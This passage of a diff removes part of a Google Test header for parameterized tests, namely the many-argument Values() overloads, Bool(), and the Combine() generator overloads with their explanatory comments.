-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39>
-internal::ValueArray39<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39> Values(T1 v1, T2 v2,
-    T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12,
-    T13 v13, T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20,
-    T21 v21, T22 v22, T23 v23, T24 v24, T25 v25, T26 v26, T27 v27, T28 v28,
-    T29 v29, T30 v30, T31 v31, T32 v32, T33 v33, T34 v34, T35 v35, T36 v36,
-    T37 v37, T38 v38, T39 v39) {
-  return internal::ValueArray39<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39>(v1,
-      v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17,
-      v18, v19, v20, v21, v22, v23, v24, v25, v26, v27, v28, v29, v30, v31,
-      v32, v33, v34, v35, v36, v37, v38, v39);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40>
-internal::ValueArray40<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40> Values(T1 v1,
-    T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11,
-    T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19,
-    T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25, T26 v26, T27 v27,
-    T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33, T34 v34, T35 v35,
-    T36 v36, T37 v37, T38 v38, T39 v39, T40 v40) {
-  return internal::ValueArray40<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15,
-      v16, v17, v18, v19, v20, v21, v22, v23, v24, v25, v26, v27, v28, v29,
-      v30, v31, v32, v33, v34, v35, v36, v37, v38, v39, v40);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41>
-internal::ValueArray41<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-    T41> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-    T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-    T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-    T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41) {
-  return internal::ValueArray41<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14,
-      v15, v16, v17, v18, v19, v20, v21, v22, v23, v24, v25, v26, v27, v28,
-      v29, v30, v31, v32, v33, v34, v35, v36, v37, v38, v39, v40, v41);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42>
-internal::ValueArray42<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-    T42> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-    T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-    T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-    T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-    T42 v42) {
-  return internal::ValueArray42<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13,
-      v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24, v25, v26, v27,
-      v28, v29, v30, v31, v32, v33, v34, v35, v36, v37, v38, v39, v40, v41,
-      v42);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43>
-internal::ValueArray43<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-    T43> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-    T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-    T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-    T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-    T42 v42, T43 v43) {
-  return internal::ValueArray43<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42, T43>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12,
-      v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24, v25, v26,
-      v27, v28, v29, v30, v31, v32, v33, v34, v35, v36, v37, v38, v39, v40,
-      v41, v42, v43);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44>
-internal::ValueArray44<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    T44> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-    T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-    T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-    T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-    T42 v42, T43 v43, T44 v44) {
-  return internal::ValueArray44<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42, T43, T44>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11,
-      v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24, v25,
-      v26, v27, v28, v29, v30, v31, v32, v33, v34, v35, v36, v37, v38, v39,
-      v40, v41, v42, v43, v44);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45>
-internal::ValueArray45<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    T44, T45> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8,
-    T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16,
-    T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24,
-    T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32,
-    T33 v33, T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40,
-    T41 v41, T42 v42, T43 v43, T44 v44, T45 v45) {
-  return internal::ValueArray45<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42, T43, T44, T45>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10,
-      v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24,
-      v25, v26, v27, v28, v29, v30, v31, v32, v33, v34, v35, v36, v37, v38,
-      v39, v40, v41, v42, v43, v44, v45);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46>
-internal::ValueArray46<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    T44, T45, T46> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7,
-    T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23,
-    T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31,
-    T32 v32, T33 v33, T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39,
-    T40 v40, T41 v41, T42 v42, T43 v43, T44 v44, T45 v45, T46 v46) {
-  return internal::ValueArray46<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42, T43, T44, T45, T46>(v1, v2, v3, v4, v5, v6, v7, v8, v9,
-      v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23,
-      v24, v25, v26, v27, v28, v29, v30, v31, v32, v33, v34, v35, v36, v37,
-      v38, v39, v40, v41, v42, v43, v44, v45, v46);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47>
-internal::ValueArray47<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    T44, T45, T46, T47> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7,
-    T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23,
-    T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31,
-    T32 v32, T33 v33, T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39,
-    T40 v40, T41 v41, T42 v42, T43 v43, T44 v44, T45 v45, T46 v46, T47 v47) {
-  return internal::ValueArray47<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42, T43, T44, T45, T46, T47>(v1, v2, v3, v4, v5, v6, v7, v8,
-      v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23,
-      v24, v25, v26, v27, v28, v29, v30, v31, v32, v33, v34, v35, v36, v37,
-      v38, v39, v40, v41, v42, v43, v44, v45, v46, v47);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48>
-internal::ValueArray48<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    T44, T45, T46, T47, T48> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6,
-    T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23,
-    T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31,
-    T32 v32, T33 v33, T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39,
-    T40 v40, T41 v41, T42 v42, T43 v43, T44 v44, T45 v45, T46 v46, T47 v47,
-    T48 v48) {
-  return internal::ValueArray48<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42, T43, T44, T45, T46, T47, T48>(v1, v2, v3, v4, v5, v6, v7,
-      v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22,
-      v23, v24, v25, v26, v27, v28, v29, v30, v31, v32, v33, v34, v35, v36,
-      v37, v38, v39, v40, v41, v42, v43, v44, v45, v46, v47, v48);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48, typename T49>
-internal::ValueArray49<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    T44, T45, T46, T47, T48, T49> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5,
-    T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14,
-    T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22,
-    T23 v23, T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30,
-    T31 v31, T32 v32, T33 v33, T34 v34, T35 v35, T36 v36, T37 v37, T38 v38,
-    T39 v39, T40 v40, T41 v41, T42 v42, T43 v43, T44 v44, T45 v45, T46 v46,
-    T47 v47, T48 v48, T49 v49) {
-  return internal::ValueArray49<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42, T43, T44, T45, T46, T47, T48, T49>(v1, v2, v3, v4, v5, v6,
-      v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21,
-      v22, v23, v24, v25, v26, v27, v28, v29, v30, v31, v32, v33, v34, v35,
-      v36, v37, v38, v39, v40, v41, v42, v43, v44, v45, v46, v47, v48, v49);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48, typename T49, typename T50>
-internal::ValueArray50<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    T44, T45, T46, T47, T48, T49, T50> Values(T1 v1, T2 v2, T3 v3, T4 v4,
-    T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13,
-    T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21,
-    T22 v22, T23 v23, T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29,
-    T30 v30, T31 v31, T32 v32, T33 v33, T34 v34, T35 v35, T36 v36, T37 v37,
-    T38 v38, T39 v39, T40 v40, T41 v41, T42 v42, T43 v43, T44 v44, T45 v45,
-    T46 v46, T47 v47, T48 v48, T49 v49, T50 v50) {
-  return internal::ValueArray50<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42, T43, T44, T45, T46, T47, T48, T49, T50>(v1, v2, v3, v4,
-      v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19,
-      v20, v21, v22, v23, v24, v25, v26, v27, v28, v29, v30, v31, v32, v33,
-      v34, v35, v36, v37, v38, v39, v40, v41, v42, v43, v44, v45, v46, v47,
-      v48, v49, v50);
-}
-
-// Bool() allows generating tests with parameters in a set of (false, true).
-//
-// Synopsis:
-// Bool()
-//   - returns a generator producing sequences with elements {false, true}.
-//
-// It is useful when testing code that depends on Boolean flags. Combinations
-// of multiple flags can be tested when several Bool()'s are combined using
-// Combine() function.
-//
-// In the following example all tests in the test case FlagDependentTest
-// will be instantiated twice with parameters false and true.
-//
-// class FlagDependentTest : public testing::TestWithParam<bool> {
-//   virtual void SetUp() {
-//     external_flag = GetParam();
-//   }
-// }
-// INSTANTIATE_TEST_CASE_P(BoolSequence, FlagDependentTest, Bool());
-//
-inline internal::ParamGenerator<bool> Bool() {
-  return Values(false, true);
-}
-
-# if GTEST_HAS_COMBINE
-// Combine() allows the user to combine two or more sequences to produce
-// values of a Cartesian product of those sequences' elements.
-//
-// Synopsis:
-// Combine(gen1, gen2, ..., genN)
-//   - returns a generator producing sequences with elements coming from
-//     the Cartesian product of elements from the sequences generated by
-//     gen1, gen2, ..., genN. The sequence elements will have a type of
-//     tuple<T1, T2, ..., TN> where T1, T2, ..., TN are the types
-//     of elements from sequences produces by gen1, gen2, ..., genN.
-//
-// Combine can have up to 10 arguments. This number is currently limited
-// by the maximum number of elements in the tuple implementation used by Google
-// Test.
-//
-// Example:
-//
-// This will instantiate tests in test case AnimalTest each one with
-// the parameter values tuple("cat", BLACK), tuple("cat", WHITE),
-// tuple("dog", BLACK), and tuple("dog", WHITE):
-//
-// enum Color { BLACK, GRAY, WHITE };
-// class AnimalTest
-//     : public testing::TestWithParam<tuple<const char*, Color> > {...};
-//
-// TEST_P(AnimalTest, AnimalLooksNice) {...}
-//
-// INSTANTIATE_TEST_CASE_P(AnimalVariations, AnimalTest,
-//                         Combine(Values("cat", "dog"),
-//                                 Values(BLACK, WHITE)));
-//
-// This will instantiate tests in FlagDependentTest with all variations of two
-// Boolean flags:
-//
-// class FlagDependentTest
-//     : public testing::TestWithParam<tuple<bool, bool> > {
-//   virtual void SetUp() {
-//     // Assigns external_flag_1 and external_flag_2 values from the tuple.
-//     tie(external_flag_1, external_flag_2) = GetParam();
-//   }
-// };
-//
-// TEST_P(FlagDependentTest, TestFeature1) {
-//   // Test your code using external_flag_1 and external_flag_2 here.
-// }
-// INSTANTIATE_TEST_CASE_P(TwoBoolSequence, FlagDependentTest,
-//                         Combine(Bool(), Bool()));
-//
-template <typename Generator1, typename Generator2>
-internal::CartesianProductHolder2<Generator1, Generator2> Combine(
-    const Generator1& g1, const Generator2& g2) {
-  return internal::CartesianProductHolder2<Generator1, Generator2>(
-      g1, g2);
-}
-
-template <typename Generator1, typename Generator2, typename Generator3>
-internal::CartesianProductHolder3<Generator1, Generator2, Generator3> Combine(
-    const Generator1& g1, const Generator2& g2, const Generator3& g3) {
-  return internal::CartesianProductHolder3<Generator1, Generator2, Generator3>(
-      g1, g2, g3);
-}
-
-template <typename Generator1, typename Generator2, typename Generator3,
-    typename Generator4>
-internal::CartesianProductHolder4<Generator1, Generator2, Generator3,
-    Generator4> Combine(
-    const Generator1& g1, const Generator2& g2, const Generator3& g3,
-        const Generator4& g4) {
-  return internal::CartesianProductHolder4<Generator1, Generator2, Generator3,
-      Generator4>(
-      g1, g2, g3, g4);
-}
-
-template <typename Generator1, typename Generator2, typename Generator3,
-    typename Generator4, typename Generator5>
-internal::CartesianProductHolder5<Generator1, Generator2, Generator3,
-    Generator4, Generator5> Combine(
-    const Generator1& g1, const Generator2& g2, const Generator3& g3,
-        const Generator4& g4, const Generator5& g5) {
-  return internal::CartesianProductHolder5<Generator1, Generator2, Generator3,
-      Generator4, Generator5>(
-      g1, g2, g3, g4, g5);
-}
-
-template <typename Generator1, typename Generator2, typename Generator3,
-    typename Generator4, typename Generator5, typename Generator6>
-internal::CartesianProductHolder6<Generator1, Generator2, Generator3,
-    Generator4, Generator5, Generator6> Combine(
-    const Generator1& g1, const Generator2& g2, const Generator3& g3,
-        const Generator4& g4, const Generator5& g5, const Generator6& g6) {
-  return internal::CartesianProductHolder6<Generator1, Generator2, Generator3,
-      Generator4, Generator5, Generator6>(
-      g1, g2, g3, g4, g5, g6);
-}
-
-template <typename Generator1, typename Generator2, typename Generator3,
-    typename Generator4, typename Generator5, typename Generator6,
-    typename Generator7>
-internal::CartesianProductHolder7<Generator1, Generator2, Generator3,
-    Generator4, Generator5, Generator6, Generator7> Combine(
-    const Generator1& g1, const Generator2& g2, const Generator3& g3,
-        const Generator4& g4, const Generator5& g5, const Generator6& g6,
-        const Generator7& g7) {
-  return internal::CartesianProductHolder7<Generator1, Generator2, Generator3,
-      Generator4, Generator5, Generator6, Generator7>(
-      g1, g2, g3, g4, g5, g6, g7);
-}
-
-template <typename Generator1, typename Generator2, typename Generator3,
-    typename Generator4, typename Generator5, typename Generator6,
-    typename Generator7, typename Generator8>
-internal::CartesianProductHolder8<Generator1, Generator2, Generator3,
-    Generator4, Generator5, Generator6, Generator7, Generator8> Combine(
-    const Generator1& g1, const Generator2& g2, const Generator3& g3,
-        const Generator4& g4, const Generator5& g5, const Generator6& g6,
-        const Generator7& g7, const Generator8& g8) {
-  return internal::CartesianProductHolder8<Generator1, Generator2, Generator3,
-      Generator4, Generator5, Generator6, Generator7, Generator8>(
-      g1, g2, g3, g4, g5, g6, g7, g8);
-}
-
-template <typename Generator1, typename Generator2, typename Generator3,
-    typename Generator4, typename Generator5, typename Generator6,
-    typename Generator7, typename Generator8, typename Generator9>
-internal::CartesianProductHolder9<Generator1, Generator2, Generator3,
-    Generator4, Generator5, Generator6, Generator7, Generator8,
-    Generator9> Combine(
-    const Generator1& g1, const Generator2& g2, const Generator3& g3,
-        const Generator4& g4, const Generator5& g5, const Generator6& g6,
-        const Generator7& g7, const Generator8& g8, const Generator9& g9) {
-  return internal::CartesianProductHolder9<Generator1, Generator2, Generator3,
-      Generator4, Generator5, Generator6, Generator7, Generator8, Generator9>(
-      g1, g2, g3, g4, g5, g6, g7, g8, g9);
-}
-
-template <typename Generator1, typename Generator2, typename Generator3,
-    typename Generator4, typename Generator5, typename Generator6,
-    typename Generator7, typename Generator8, typename Generator9,
-    typename Generator10>
-internal::CartesianProductHolder10<Generator1, Generator2, Generator3,
-    Generator4, Generator5, Generator6, Generator7, Generator8, Generator9,
-    Generator10> Combine(
